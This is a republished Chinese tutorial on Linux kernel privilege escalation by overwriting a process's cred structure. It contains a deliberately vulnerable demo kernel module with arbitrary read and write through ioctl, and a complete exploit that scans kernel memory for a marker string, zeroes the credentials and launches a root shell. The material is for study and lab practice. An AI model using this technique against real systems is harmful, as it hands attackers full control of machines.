本文主要是介绍linux 内核提权总结(demo+exp分析) -- 任意读写(一),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
cred篇
本文转自网络文章,内容均为非盈利,版权归原作者所有。
转载此文章仅为个人收藏,分享知识,如有侵权,马上删除。
原文作者:jmpcall
专栏地址:https://zhuanlan.kanxue.com/user-815036.htm
- 每个线程在内核中都对应一个线程结构块thread_info
- thread_info中存在task_struct类型结构体
struct task_struct中存在cred结构体用来保存线程权限
攻击流程
- 定位某进程的cred结构体
- 将cred结构提结构体的uid~fsgid全部覆写为0(前28字节)
一. 利用步骤
1. 定位cred结构体
-
task_struct中存在char comm[TASK_COMM_LEN]
-
comm字符串使用prctl函数的PR_SET_NAME自行设置
-
在内存中搜索被设置后的comm字符串,cred结构体地址就在附近
-
泄漏cred结构体地址,定向覆盖cred结构体
2. 弹出root shell
进程权限被修改,变成root进程,执行system("/bin/sh"),弹出root shell
二. 驱动代码
#include <linux/init.h>
#include <linux/module.h>
#include <linux/cdev.h>
#include <linux/device.h>
#include <linux/fs.h>
#include <linux/uaccess.h>
#include <asm/cacheflush.h>#define CHANGE_POINT 0x100000
#define RW_READ 0x100001
#define RW_WRITE 0x100002
#define SET_MEM 0x100003dev_t dev_id = 0;
struct cdev cdev_0;
struct class *dev_class;struct vunl
{char *point;size_t size;
} VUNL;long rw_any_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{int ret = 0;switch (cmd){case CHANGE_POINT:ret = copy_from_user(&VUNL, (struct vunl *)(arg), sizeof(struct vunl));break;case RW_READ:ret = copy_to_user((char *)arg, (char *)VUNL.point, VUNL.size);break;case RW_WRITE:ret = copy_from_user((char *)VUNL.point, (char *)arg, VUNL.size);break;default:break;}return ret;
}int rw_any_init(void)
{unsigned int base_minor = 0;unsigned int dev_num = 1;static const struct file_operations fops = {.unlocked_ioctl = rw_any_ioctl};alloc_chrdev_region(&dev_id, base_minor, dev_num, "rw_any");cdev_init(&cdev_0, &fops);cdev_add(&cdev_0, dev_id, 1);dev_class = class_create(THIS_MODULE, "rw_any_class");device_create(dev_class, 0, dev_id, NULL, "rw_any_dev");return 0;
}void rw_any_exit(void)
{device_destroy(dev_class, dev_id);class_destroy(dev_class);cdev_del(&cdev_0);unregister_chrdev_region(dev_id, 1);
}module_init(rw_any_init);
module_exit(rw_any_exit);MODULE_LICENSE("GPL");三. exp
#define _GNU_SOURCE#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>#define CHANGE_POINT 0x100000
#define RW_READ 0x100001
#define RW_WRITE 0x100002struct vunl
{char *point;size_t size;
} VUNL;size_t leak_data(int fd, char *buf, char *target)
{char *res = 0;size_t cred = 0;size_t real_cred = 0;VUNL.size = 0x1000;for (size_t addr = 0xffff880000000000; addr < 0xffffc80000000000; addr += 0x1000){VUNL.point = (char *)addr;ioctl(fd, CHANGE_POINT, &VUNL);ioctl(fd, RW_READ, buf);res = memmem(buf, 0x1000, target, 16);if (res){printf("[+] the addr of comm[TASK_COMM_LEN] is: %p\n", res);cred = *(size_t *)(res - 0x8);real_cred = *(size_t *)(res - 0x10);if ((cred || 0xff00000000000000) && (real_cred == cred)){printf("[+] found cred 0x%lx\n", real_cred);break;}}if (res == 0){puts("[-] not found, try again!\n");}}return real_cred;
}int main()
{int fd = 0;char target[16] = "TheTargetOfComm";char *buf = malloc(0x1000);char payload[28] = {0};size_t cred = 0;prctl(PR_SET_NAME, target);fd = open("/dev/rw_any_dev", O_RDWR);VUNL.point = (char *)leak_data(fd, buf, target);VUNL.size = 28;ioctl(fd, CHANGE_POINT, &VUNL);ioctl(fd, RW_WRITE, payload);if (getuid() == 0){printf("[+] r00t:\n");system("/bin/sh");}else{puts("[-] error!");exit(-1);}return 0;
}
这篇关于linux 内核提权总结(demo+exp分析) -- 任意读写(一)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
